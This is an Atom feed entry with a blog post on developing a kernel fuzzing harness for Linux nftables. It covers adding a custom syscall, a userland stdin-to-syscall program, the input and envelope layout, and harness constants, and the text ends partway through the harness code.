<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://h0mbre.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://h0mbre.github.io/" rel="alternate" type="text/html" /><updated>2025-10-15T00:10:05+00:00</updated><id>https://h0mbre.github.io/feed.xml</id><title type="html">The Human Machine Interface</title><subtitle>fuzzing + exploitation</subtitle><entry><title type="html">Lucid Dreams II: Harness Development</title><link href="https://h0mbre.github.io/Lucid_Dreams_2/" rel="alternate" type="text/html" title="Lucid Dreams II: Harness Development" /><published>2025-10-13T00:00:00+00:00</published><updated>2025-10-13T00:00:00+00:00</updated><id>https://h0mbre.github.io/Lucid_Dreams_2</id><content type="html" xml:base="https://h0mbre.github.io/Lucid_Dreams_2/"><![CDATA[<h2 id="background">Background</h2>
<p>Last episode on the blog we took a shallow and broad approach to fuzzing several Netlink-plumbed subsystems like Netfilter, Route, Crypto, and Xfrm. This endeavor wasn’t necessarily an earnest bug finding mission since we mostly wanted to just see how fuzzing a real target with Lucid would go and what things would need tweaking. We ended up changing quite a bit of the core-fuzzer features, specifically Redqueen issues, and were able to improve the fuzzer quite a bit. We modularized the mutator component of Lucid so now writing your own fuzzer for Lucid is as simple as implementing your own mutator. We can extend this even more, and will, by enabling the user to pass command line arguments directly to the bespoke mutator.</p>

<p>So now you can conceive of the main Lucid core components as a fuzzing engine and the mutator as the “fuzzer” because it is responsible for all of the target-specific characteristics. So for example, if we were to fuzz Chrome in Lucid, you would write a “Chrome fuzzer” by implementing your own fuzzing harness for Chrome and then implementing your own mutator to generate and mutate inputs.</p>

<p>We now switch to a more earnest bug finding mode of operation. I’ve decided for this series to focus on fuzzing <a href="https://en.wikipedia.org/wiki/Nftables"><code class="language-plaintext highlighter-rouge">nftables</code></a> for a few different reasons:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">nftables</code> doesn’t have as many eyeballs on it anymore, at least publicly, because kCTF has changed its rules around unprivileged usernamespaces which as severely decreased the value of exploitable bugs in surfaces that live behind those namespaces, so less competition</li>
  <li><code class="language-plaintext highlighter-rouge">nftables</code> is extremely complex. There are serveral hierarchical structures and states that can occur and in addition, the code exists on two planes: a configuration plane responsible for creating these nested and complex resources and a data plane responsible for interacting with those created structures. For the early going, we’re going to be focusing exclusively on the control plane with designs on implementing data plane interactions later</li>
  <li><code class="language-plaintext highlighter-rouge">nftables</code> has a history of bugs, so much so that it was explicitly disabled in kCTF’s bounty program</li>
  <li>Syzkaller fuzzes <code class="language-plaintext highlighter-rouge">nftables</code> already, but if you look at the types of messages it is able to generate, it tends to favor syntactically-valid but semantically-invalid inputs. For instance, it will send a well-formed message to create a resource, but the argument values themselves may be nonsense. Further, syzkaller currently has no way to track the state of resources if they were successfully created. So sequences like create resource -&gt; modify resource -&gt; use resource -&gt; destroy resource are not possible currently unless they happen by sheer random chance which is highly unlikely</li>
  <li>lastly, this represents a fun engineering challenge. Creating a mutator/generator that is able to achieve deep stateful coverage of <code class="language-plaintext highlighter-rouge">nftables</code> will be something unique as far as public research goes I think</li>
</ul>

<h2 id="adding-custom-syscall">Adding Custom Syscall</h2>
<p>The first thing we need is a way to interact with the <code class="language-plaintext highlighter-rouge">nftables</code> subsystem. My goto strategy here is to just create a custom syscall that usually takes a userland buffer pointer and a data length. This allows us to send an input from userland and have it traverse the harness and then hit the target subsystem. Now, this is not how I want to <em>fuzz</em>, but it is a useful setup for debugging, collecting coverage metrics for visualization, and also reproducing crashes. Ideally the flow looks like this:</p>
<ol>
  <li>Send data buffer via syscall</li>
  <li>Context-switch to kernel mode as harness is about to parse input</li>
  <li>[FUZZING-ONLY] Take snapshot</li>
  <li>Harness parses input and dispatches to target subsystem</li>
  <li>[FUZZING-ONLY] Reset snapshot</li>
  <li>Return to userland</li>
</ol>

<p>This setup gives us the best of both worlds, we can easily debug and play with our harness from userland and we can also fuzz completely in kernel context without having to emulate any expensive context switches per fuzzcase.</p>

<p>To add a new syscall, we have to edit the <code class="language-plaintext highlighter-rouge">syscall_64.tbl</code> file found in <code class="language-plaintext highlighter-rouge">linux_version/arch/x86/entry/syscalls</code>, wherein I added a new syscall entry right after the last syscall entry:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="mi">466</span>	<span class="n">common</span>	<span class="n">removexattrat</span>		<span class="n">sys_removexattrat</span>
<span class="mi">467</span>	<span class="n">common</span>	<span class="n">open_tree_attr</span>		<span class="n">sys_open_tree_attr</span>
<span class="mi">468</span>	<span class="n">common</span>	<span class="n">file_getattr</span>		<span class="n">sys_file_getattr</span>
<span class="mi">469</span>	<span class="n">common</span>	<span class="n">file_setattr</span>		<span class="n">sys_file_setattr</span>
<span class="mi">470</span> <span class="n">common</span>  <span class="n">lucid_fuzz</span>          <span class="n">sys_lucid_fuzz</span>
</code></pre></div></div>

<p>Now we have to define it in the <code class="language-plaintext highlighter-rouge">linux_version/include/linux/syscalls.h</code> file:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">asmlinkage</span> <span class="kt">long</span> <span class="nf">sys_geteuid16</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="n">asmlinkage</span> <span class="kt">long</span> <span class="nf">sys_getgid16</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="n">asmlinkage</span> <span class="kt">long</span> <span class="nf">sys_getegid16</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="n">asmlinkage</span> <span class="kt">long</span> <span class="nf">sys_lucid_fuzz</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">);</span>
</code></pre></div></div>

<p>Because we want to fuzz <code class="language-plaintext highlighter-rouge">nftables</code>, I decided to implement the syscall itself in a new file called <code class="language-plaintext highlighter-rouge">lucid_fuzz.c</code> and placed that inside <code class="language-plaintext highlighter-rouge">linux_version/net/netfilter</code> folder:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;linux/kernel.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/syscalls.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/uaccess.h&gt;</span><span class="cp">
</span>
<span class="n">SYSCALL_DEFINE2</span><span class="p">(</span><span class="n">lucid_fuzz</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="s">"Inside lucid fuzz!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we have to tell the kernel to compile this source file. This is accomplished by editing the folder’s <code class="language-plaintext highlighter-rouge">Makefile</code> to ensure that our <code class="language-plaintext highlighter-rouge">lucid_fuzz.c</code> file is used to create an object file. I changed the top line of the <code class="language-plaintext highlighter-rouge">Makefile</code> in my kernel version <code class="language-plaintext highlighter-rouge">6.17</code> to this:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>netfilter-objs := core.o nf_log.o nf_queue.o nf_sockopt.o utils.o lucid_fuzz.o
</code></pre></div></div>

<p>When we build the kernel, we should see this in the output</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  CC      net/netfilter/lucid_fuzz.o
</code></pre></div></div>

<p>To interact with the syscall, we’ll need a userland program. This is a small program to read data from standard in (easy to use in the future to reproduce crashes or replay fuzzing inputs) and then send that data via the syscall to the kernel:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// gcc harness.c -o harness -static</span>
<span class="cp">#define _GNU_SOURCE
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/syscall.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;limits.h&gt;</span><span class="cp">
</span>
<span class="cp">#ifndef __NR_lucid_fuzz
#define __NR_lucid_fuzz 470 // Our syscall number
#endif
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Start at a page, we'll double this if we need more memory</span>
    <span class="kt">size_t</span> <span class="n">cap</span> <span class="o">=</span> <span class="mi">4096</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">const</span> <span class="kt">size_t</span> <span class="n">MAX_CAP</span> <span class="o">=</span> <span class="mi">64</span> <span class="o">*</span> <span class="mi">1024</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">;</span> <span class="c1">// Shouldn't need more than this?</span>

    <span class="c1">// Create a buffer to hold data</span>
    <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">cap</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"malloc"</span><span class="p">);</span>
        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Read until we can't</span>
    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Grab data from standard in, taking into account the offset as determined</span>
        <span class="c1">// by `len`</span>
        <span class="kt">ssize_t</span> <span class="n">n</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">buf</span> <span class="o">+</span> <span class="n">len</span><span class="p">,</span> <span class="n">cap</span> <span class="o">-</span> <span class="n">len</span><span class="p">);</span>

        <span class="c1">// If we got bytes...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// Adjust offset</span>
            <span class="n">len</span> <span class="o">+=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">n</span><span class="p">;</span>

            <span class="c1">// See if we hit the current cap</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">==</span> <span class="n">cap</span><span class="p">)</span> <span class="p">{</span>

                <span class="c1">// Hit sanity check, bail</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">cap</span> <span class="o">&gt;=</span> <span class="n">MAX_CAP</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"refusing to grow beyond %zu bytes</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">MAX_CAP</span><span class="p">);</span>
                    <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
                    <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
                <span class="p">}</span>

                <span class="c1">// Create new backing buffer</span>
                <span class="kt">size_t</span> <span class="n">ncap</span> <span class="o">=</span> <span class="n">cap</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>

                <span class="c1">// Lol </span>
                <span class="k">if</span> <span class="p">(</span><span class="n">ncap</span> <span class="o">&lt;=</span> <span class="n">cap</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"size overflow</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
                    <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
                    <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
                <span class="p">}</span>

                <span class="c1">// Make sure we didn't do an oopsie</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">ncap</span> <span class="o">&gt;</span> <span class="n">MAX_CAP</span><span class="p">)</span> <span class="n">ncap</span> <span class="o">=</span> <span class="n">MAX_CAP</span><span class="p">;</span>
                <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">realloc</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">ncap</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">tmp</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">perror</span><span class="p">(</span><span class="s">"realloc"</span><span class="p">);</span>
                    <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
                    <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
                <span class="p">}</span>

                <span class="c1">// Update </span>
                <span class="n">buf</span> <span class="o">=</span> <span class="n">tmp</span><span class="p">;</span>
                <span class="n">cap</span> <span class="o">=</span> <span class="n">ncap</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">continue</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// Done reading: EOF</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>

        <span class="c1">// Failed to read but just because of an interrupt, try again</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">errno</span> <span class="o">==</span> <span class="n">EINTR</span><span class="p">)</span> <span class="k">continue</span><span class="p">;</span>
        
        <span class="c1">// Bail on any other errors</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">perror</span><span class="p">(</span><span class="s">"read"</span><span class="p">);</span>
            <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
            <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Call our custom syscall </span>
    <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">syscall</span><span class="p">(</span><span class="n">__NR_lucid_fuzz</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">len</span><span class="p">);</span>

    <span class="c1">// Need to make sure that our syscall returns meaningful data on error</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">int</span> <span class="n">e</span> <span class="o">=</span> <span class="n">errno</span><span class="p">;</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"lucid_fuzz failed: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">e</span><span class="p">));</span>
        <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">printf</span><span class="p">(</span><span class="s">"lucid_fuzz returned %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we can test in <code class="language-plaintext highlighter-rouge">qemu-system</code>:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@syzkaller:~#</span><span class="w"> </span><span class="nb">echo</span> <span class="s2">"lol"</span> | harness
<span class="go">[  256.492957] Inside lucid fuzz!
lucid_fuzz returned 0
</span><span class="gp">root@syzkaller:~#</span><span class="w"> 
</span></code></pre></div></div>

<p>So everything works with the syscall, now it’s time to make it an actual fuzzing harness.</p>

<h2 id="deciding-input-format">Deciding Input Format</h2>
<p>We want to be able to create stateful inputs for <code class="language-plaintext highlighter-rouge">nftables</code>. This obviously means we need enough runway initially in our inputs to <em>build up complex state</em>! This seems obvious and simple, but I think it’s hard to actually implement correctly. We have to consider various things like:</p>
<ul>
  <li>Not all “state” is “good state”: Just because an input can create 4096 <code class="language-plaintext highlighter-rouge">nft_table</code> data structures, doesn’t mean that that’s interesting from a vulnerability research perspective</li>
  <li>Short inputs are not likely going to create complex state: We need to have somewhat long inputs in order to build up state</li>
  <li>Extremely large inputs may be meaningless: There may not be any meaningful difference between short and long inputs when the short input is <em>long enough</em> to create “good state” and we may end up spending tons of CPU cycles doing nothing interesting and working on enormous inputs</li>
</ul>

<p>With these things in mind, let’s first take a cautious approach and make sure we can generate long inputs <em>some</em> of the time, but most of the time focus on relatively normal sized inputs.</p>

<h3 id="nftables-messages"><code class="language-plaintext highlighter-rouge">nftables</code> Messages</h3>
<p><code class="language-plaintext highlighter-rouge">nftables</code> expects Netlink messages that are formatted a certain way. It has two modes of messaging as far as I can tell: standalone messages, which are simple messages like “object getters” and batched messages, which are for object creation/modification/deletion. They have gone with a design where anything that can modify state is subject to batching and everything that is read-only can be a standalone message. In the batch mode of operation, <code class="language-plaintext highlighter-rouge">nftables</code> will have something like a “staging” phase, where it parses the messages in the batch and validates them. While it’s validating each individual batched message, it makes sure that the resources being created/manipulated are sane and actually exist and are modifiable. <code class="language-plaintext highlighter-rouge">nftables</code> will stage all the changes and then if a single message fails in the batch, will attempt to roll back all of those staged changes. If batch message parsing succeeds however, it moves into a “commit” phase and makes the changes.</p>

<p>So basically, our input generator will need to be capable of sending batches of <code class="language-plaintext highlighter-rouge">nftables</code> requests with some simple read-only requests sprinkled in rarely. I decided to follow a high level input shape that is very similar to our last blogpost for this purpose. We will do the following:</p>
<ol>
  <li>Have Lucid inject a buffer of bytes at a location in Bochs’ memory. This is standard and how you want to separate duties between Lucid the fuzzing engine and Lucid’s mutators/generators. Let Lucid the fuzzing engine inject a byte blob, let the harness/mutator/generator make sense of the blob.</li>
  <li>We will pre-allocate socket buffer structures <code class="language-plaintext highlighter-rouge">skb(s)</code> in the kernel so that we don’t do any large allocations in the fuzzing loop</li>
  <li>The harness will parse the byte blob, and package each input series from the mutator in an <code class="language-plaintext highlighter-rouge">skb</code> and ship the <code class="language-plaintext highlighter-rouge">skb</code> off to <code class="language-plaintext highlighter-rouge">nftables</code> for parsing</li>
  <li>We will separate series of <code class="language-plaintext highlighter-rouge">nftables</code> messages into what we’ll call “envelopes”. Last blogpost we called them “messages” but because Netlink also operates on “messages” this nomenclature is confusing.</li>
</ol>

<p>Our input then will contain two different data structures as the harness sees things:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// An input structure</span>
<span class="k">struct</span> <span class="n">lf_input</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">total_len</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">num_envs</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="c1">// An envelope structure</span>
<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>
</code></pre></div></div>

<p>This is very similar to our <a href="https://h0mbre.github.io/Lucid_Dreams_1/">last blogpost</a>, but with some key changes to the <code class="language-plaintext highlighter-rouge">envelope</code> structure. So in practice, an input will always have a single <code class="language-plaintext highlighter-rouge">struct lf_input</code> structure at its beginning describing the input in its entirety, and then, up to the max number of envelopes, a series of <code class="language-plaintext highlighter-rouge">struct lf_envelope</code> structures containing the actual Netlink messages for <code class="language-plaintext highlighter-rouge">nftables</code> in its <code class="language-plaintext highlighter-rouge">data</code> member. So an input may look like:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[
	[lf_input: total_len=4096, num_msgs=2]
		[lf_envelope: len=2048, &lt;data&gt;]
		[lf_envelope: len=2048, &lt;data&gt;]
]
</code></pre></div></div>

<p>Remember: the core Lucid components know nothing about this structure, Lucid is only responsible for injecting the input and its length into the target at a location in memory. It’s up to the mutator and the harness to make sense of the structure.</p>

<p>So now let’s implement the harness with this in mind. It will need to receive the bytes, parse them, wrap each envelope’s data in an <code class="language-plaintext highlighter-rouge">skb</code> and send the <code class="language-plaintext highlighter-rouge">skb</code> to <code class="language-plaintext highlighter-rouge">nftables</code>.</p>

<h2 id="reaching-nftables">Reaching <code class="language-plaintext highlighter-rouge">nftables</code></h2>
<p>The normal path user input takes to <code class="language-plaintext highlighter-rouge">nftables</code> is something like:</p>
<ol>
  <li>userland process creates an <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code> Netlink socket</li>
  <li>userland process sends request via <code class="language-plaintext highlighter-rouge">sendmsg</code> syscall or similar (maybe <code class="language-plaintext highlighter-rouge">sendto</code>) via the Netlink socket</li>
  <li>those bytes get wrapped in an <code class="language-plaintext highlighter-rouge">skb</code> in <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code></li>
  <li>based on the socket’s protocol type, <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code> will find the Netfilter’s registered kernel socket that was initialized at kernel boot, the socket has a callback attached to it called <code class="language-plaintext highlighter-rouge">.input</code> that is to be invoked when there is data ready for it</li>
  <li>The callback, which points to <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code>, is invoked and receives the <code class="language-plaintext highlighter-rouge">skb</code> holding our data from userland</li>
</ol>

<p>We can do similar things, but make it more direct since we know the destination in our harness is <code class="language-plaintext highlighter-rouge">nftables</code>. We can:</p>
<ol>
  <li>Pre-allocate <code class="language-plaintext highlighter-rouge">skb</code> structures to hold our envelopes</li>
  <li>Parse the <code class="language-plaintext highlighter-rouge">lf_input</code>, and by included <code class="language-plaintext highlighter-rouge">lf_envelope</code>:</li>
  <li>Stuff the envelope’s data into an <code class="language-plaintext highlighter-rouge">skb</code></li>
  <li>Send the <code class="language-plaintext highlighter-rouge">skb</code> directly to <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code></li>
  <li>Repeat, go back to the 3</li>
</ol>

<h2 id="harness-init-code">Harness Init Code</h2>
<p>Let’s go ahead and fill out the logic for the initialization routine of our custom syscall, this is code that will be invoked <em>once</em> before we start fuzzing and will not occur in the fuzzing loop. This is code that is meant to set up everything we need for the harness to work appropriately. This is where we will setup the <code class="language-plaintext highlighter-rouge">skbs</code> and to do so, we’ll need to define some constants that describe maximum input shapes. The first constant we need to set is the <code class="language-plaintext highlighter-rouge">MAX_NUM_ENVELOPES</code>, this is going to tell us how many <code class="language-plaintext highlighter-rouge">struct lf_envelope</code> structures can exist in an <code class="language-plaintext highlighter-rouge">struct lf_input</code>. We’ll also need to know the <code class="language-plaintext highlighter-rouge">MAX_ENVELOPE_LEN</code> which will obviously describe how big these envelopes’ data payload can be. Finally, as a byproduct of both the maximum number of envelope structures and their maximum length, we’ll deduce the <code class="language-plaintext highlighter-rouge">MAX_INPUT_LEN</code>, which is the largest possible size we can achieve for the <code class="language-plaintext highlighter-rouge">lf_input-&gt;total_len</code> value.</p>

<p>For now, let’s go ahead and say that we can have up to 24 envelopes, and each one can be up to 8192 bytes. In the mutator, well define min/max thresholds where we mostly uniformly distribute size selection between those two thresholds with a small possibility of going lower or higher than them. So most of the time we’ll do at least 8 envelopes and less than or exactly 16 envelopes. Something like that. We’ll make 1-7 and 17-24 very rare. Same with the sizes, well try not to send an insane amount of <code class="language-plaintext highlighter-rouge">nftables</code> messages per envelope and approach the 8k max. But this is for a later blogpost on the mutator.</p>

<p>With the constants in mind we can build. We can do all of this in <code class="language-plaintext highlighter-rouge">af_netlink.c</code> in <code class="language-plaintext highlighter-rouge">/net/netlink</code> because it has all of the things we need access to and makes everything easy. So we’ll implement <code class="language-plaintext highlighter-rouge">lf_init</code> in there, which means we need access to <code class="language-plaintext highlighter-rouge">lucid_init</code> in our <code class="language-plaintext highlighter-rouge">lucid_fuzz.c</code> stand alone source file, so we’ll change that to:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;linux/kernel.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/syscalls.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/uaccess.h&gt;</span><span class="cp">
</span>
<span class="c1">// These will be defined in /include/net/lucid_fuzz.h</span>
<span class="k">extern</span> <span class="kt">int</span> <span class="nf">lucid_fuzz_init</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">);</span>

<span class="n">SYSCALL_DEFINE2</span><span class="p">(</span><span class="n">lucid_fuzz</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="n">printk</span><span class="p">(</span><span class="s">"Inside lucid fuzz!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">printk</span><span class="p">(</span><span class="s">"Calling lucid_fuzz_init...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">lucid_fuzz_init</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
        <span class="k">goto</span> <span class="n">done</span><span class="p">;</span>

<span class="nl">done:</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we’ll need to create that header file in <code class="language-plaintext highlighter-rouge">/include/net/lucid_fuzz.h</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* SPDX-License-Identifier: GPL-2.0 */</span>
<span class="cp">#ifndef _NET_LUCID_FUZZ_H
#define _NET_LUCID_FUZZ_H
</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_init</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">);</span>

<span class="cp">#endif </span><span class="cm">/* _NET_LUCID_FUZZ_H */</span><span class="cp">
</span></code></pre></div></div>

<p>Now we can include that header in <code class="language-plaintext highlighter-rouge">af_netlink.c</code>. And we get started in that source file with our defines of our constants we discussed:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*************** Start of Lucid Fuzzing Harness *****************************/</span>
<span class="cp">#define LF_MAX_NUM_ENVS 24UL // Number of envelopes in an input
#define LF_MAX_ENV_LEN 8192UL // Number of bytes in an envelope payload 
#define LF_INPUT_HDR_SIZE (sizeof(u32) * 2) // lf_input-&gt;total_len, num_envs
#define LF_ENV_HDR_SIZE (sizeof(u32)) // lf_envelope-&gt;len
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)
</span></code></pre></div></div>

<p>Next, I defined the <code class="language-plaintext highlighter-rouge">LUCID_SIGNATURE</code> that Lucid scans for when trying to decide where to inject inputs. It knows the layout of the <code class="language-plaintext highlighter-rouge">struct lf_fuzzcase</code> so it knows that directly after the signature portion it has a length field and then the variable length data field where it inserts the raw bytes:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Structure that describes an input as Lucid sees it</span>
<span class="k">struct</span> <span class="n">lf_fuzzcase</span> <span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">signature</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
	<span class="kt">size_t</span> <span class="n">input_len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">input</span><span class="p">[</span><span class="n">LF_MAX_INPUT_LEN</span><span class="p">];</span>
<span class="p">};</span>

<span class="c1">// Create instance of the struct</span>
<span class="k">struct</span> <span class="n">lf_fuzzcase</span> <span class="n">fc</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">signature</span> <span class="o">=</span> <span class="n">LUCID_SIGNATURE</span><span class="p">,</span>
	<span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
	<span class="p">.</span><span class="n">input</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">}</span>	<span class="cm">/* Where Lucid injects an input */</span>
<span class="p">};</span>
</code></pre></div></div>

